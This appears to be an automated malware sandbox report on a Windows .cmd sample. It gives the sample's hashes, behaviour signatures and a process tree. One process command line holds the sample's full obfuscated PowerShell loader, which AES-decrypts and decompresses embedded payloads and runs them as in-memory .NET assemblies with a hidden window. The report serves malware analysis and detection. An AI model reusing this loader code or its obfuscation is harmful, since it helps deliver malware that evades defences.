Analysis
max time kernel: 120s
max time network: 121s
platform: windows7_x64
resource: win7-20231129-en
resource tags: arch:x64, arch:x86, image:win7-20231129-en, locale:en-us, os:windows7-x64, system
submitted: 24-05-2024 12:59
Static task: static1
Behavioral task: behavioral1
Sample: 152cbca849779c40fe6673458a9e25e4be0b080f7cb4db8cfee5a88cec74b1e5.cmd
Resource: win7-20231129-en (windows7-x64)
4 signatures, 150 seconds
General
Target: 152cbca849779c40fe6673458a9e25e4be0b080f7cb4db8cfee5a88cec74b1e5.cmd
Size: 65KB
MD5: 85c9311ae0014ac8bb98089d0bd51bdc
SHA1: 5140e9beda6014b02df3c09f84a284f9c25532ca
SHA256: 152cbca849779c40fe6673458a9e25e4be0b080f7cb4db8cfee5a88cec74b1e5
SHA512: f202a1e07afb444e5264cd28f7c0eedd55a3d002d14f989bf9fb065fd451be1df6197b5dcb61c616e8dbd1d3ba43cdc058192c89858c8bc292c199d5e8e9fb54
SSDEEP: 768:std2pH1E6G5dMQzfwXLyVM0rAQiB/tp6UTGKxHHVpMGgJxhvtsQekLpzmWnfCB3Q:fpH1E6YrfDSF+UaaLtE1sQeAJ2Zlg9
Score: 8/10
Malware Config
Signatures
- Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
  Run PowerShell and hide display window.
- Suspicious behavior: EnumeratesProcesses (1 IoC)
  Processes: powershell.exe (PID 1820)
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes: powershell.exe (PID 1820), Token: SeDebugPrivilege
- Suspicious use of WriteProcessMemory (15 IoCs)
  Processes (source PID / process wrote to memory of target PID / process; each pair was recorded 3 times):
  PID 2200 cmd.exe wrote to memory of PID 804 cmd.exe (3 events)
  PID 2200 cmd.exe wrote to memory of PID 1964 cmd.exe (3 events)
  PID 1964 cmd.exe wrote to memory of PID 3016 cmd.exe (3 events)
  PID 1964 cmd.exe wrote to memory of PID 2416 cmd.exe (3 events)
  PID 1964 cmd.exe wrote to memory of PID 1820 powershell.exe (3 events)
Processes (indented entries are children of the entry above them)
- C:\Windows\system32\cmd.exe (PID 2200)
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\152cbca849779c40fe6673458a9e25e4be0b080f7cb4db8cfee5a88cec74b1e5.cmd"
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\cmd.exe (PID 804)
    Command line: cmd /c \"set __=^&rem\
  - C:\Windows\system32\cmd.exe (PID 1964)
    Command line: C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\152cbca849779c40fe6673458a9e25e4be0b080f7cb4db8cfee5a88cec74b1e5.cmd
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\cmd.exe (PID 3016)
      Command line: cmd /c \"set __=^&rem\
    - C:\Windows\system32\cmd.exe (PID 2416)
      Command line: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\152cbca849779c40fe6673458a9e25e4be0b080f7cb4db8cfee5a88cec74b1e5.cmd';$CMIY='ReazBIWdzBIWLzBIWinzBIWeszBIW'.Replace('zBIW', ''),'LXpsBoadXpsB'.Replace('XpsB', ''),'CXFxWopXFxWyTXFxWoXFxW'.Replace('XFxW', ''),'ChSZNiaSZNinSZNigSZNieExSZNiteSZNinSZNisiSZNionSZNi'.Replace('SZNi', ''),'DecehEzompehEzrehEzeehEzssehEz'.Replace('ehEz', ''),'EleFRIUmenFRIUtFRIUAFRIUtFRIU'.Replace('FRIU', ''),'InwXPBvowXPBkwXPBewXPB'.Replace('wXPB', ''),'GeAzGItCAzGIurAzGIrenAzGItAzGIPAzGIrocAzGIessAzGI'.Replace('AzGI', ''),'SWavzpWavzliWavztWavz'.Replace('Wavz', ''),'TrQRjDaQRjDnsQRjDfQRjDorQRjDmFiQRjDnQRjDaQRjDlQRjDBQRjDlQRjDoQRjDckQRjD'.Replace('QRjD', ''),'EQBEyntQBEyrQBEyyPQBEyoiQBEyntQBEy'.Replace('QBEy', ''),'CfrRUrefrRUatfrRUeDfrRUecrfrRUyptfrRUorfrRU'.Replace('frRU', ''),'FrostbEmBastbEse6stbE4SstbEtrstbEinstbEgstbE'.Replace('stbE', ''),'MlFlLailFlLnMlFlLolFlLdlFlLullFlLelFlL'.Replace('lFlL', '');powershell -w hidden;function iadMU($QWytb){$xHhyf=[System.Security.Cryptography.Aes]::Create();$xHhyf.Mode=[System.Security.Cryptography.CipherMode]::CBC;$xHhyf.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$xHhyf.Key=[System.Convert]::($CMIY[12])('tgQIjCkwwZqAzylw/Tfv+EER7SzcL8PBsCAaLmr+5qk=');$xHhyf.IV=[System.Convert]::($CMIY[12])('pSyOatGwmEbEIOKwBSvE0g==');$DSRRZ=$xHhyf.($CMIY[11])();$Quqau=$DSRRZ.($CMIY[9])($QWytb,0,$QWytb.Length);$DSRRZ.Dispose();$xHhyf.Dispose();$Quqau;}function XBiYS($QWytb){$uSNme=New-Object System.IO.MemoryStream(,$QWytb);$CliDx=New-Object System.IO.MemoryStream;$gFTqG=New-Object System.IO.Compression.GZipStream($uSNme,[IO.Compression.CompressionMode]::($CMIY[4]));$gFTqG.($CMIY[2])($CliDx);$gFTqG.Dispose();$uSNme.Dispose();$CliDx.Dispose();$CliDx.ToArray();}$uMaFe=[System.IO.File]::($CMIY[0])([Console]::Title);$zflDv=XBiYS (iadMU ([Convert]::($CMIY[12])([System.Linq.Enumerable]::($CMIY[5])($uMaFe, 5).Substring(2))));$dcHsS=XBiYS (iadMU ([Convert]::($CMIY[12])([System.Linq.Enumerable]::($CMIY[5])($uMaFe, 6).Substring(2))));[System.Reflection.Assembly]::($CMIY[1])([byte[]]$dcHsS).($CMIY[10]).($CMIY[6])($null,$null);[System.Reflection.Assembly]::($CMIY[1])([byte[]]$zflDv).($CMIY[10]).($CMIY[6])($null,$null); "
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1820)
      Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noprofile -windowstyle hidden -ep bypass
      Signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads
- memory/1820-4-0x000007FEF5F9E000-0x000007FEF5F9F000-memory.dmp (Filesize: 4KB)
- memory/1820-5-0x000000001B670000-0x000000001B952000-memory.dmp (Filesize: 2.9MB)
- memory/1820-6-0x0000000002240000-0x0000000002248000-memory.dmp (Filesize: 32KB)
- memory/1820-7-0x000007FEF5CE0000-0x000007FEF667D000-memory.dmp (Filesize: 9.6MB)
- memory/1820-8-0x000007FEF5CE0000-0x000007FEF667D000-memory.dmp (Filesize: 9.6MB)
- memory/1820-9-0x000007FEF5CE0000-0x000007FEF667D000-memory.dmp (Filesize: 9.6MB)
- memory/1820-10-0x000007FEF5CE0000-0x000007FEF667D000-memory.dmp (Filesize: 9.6MB)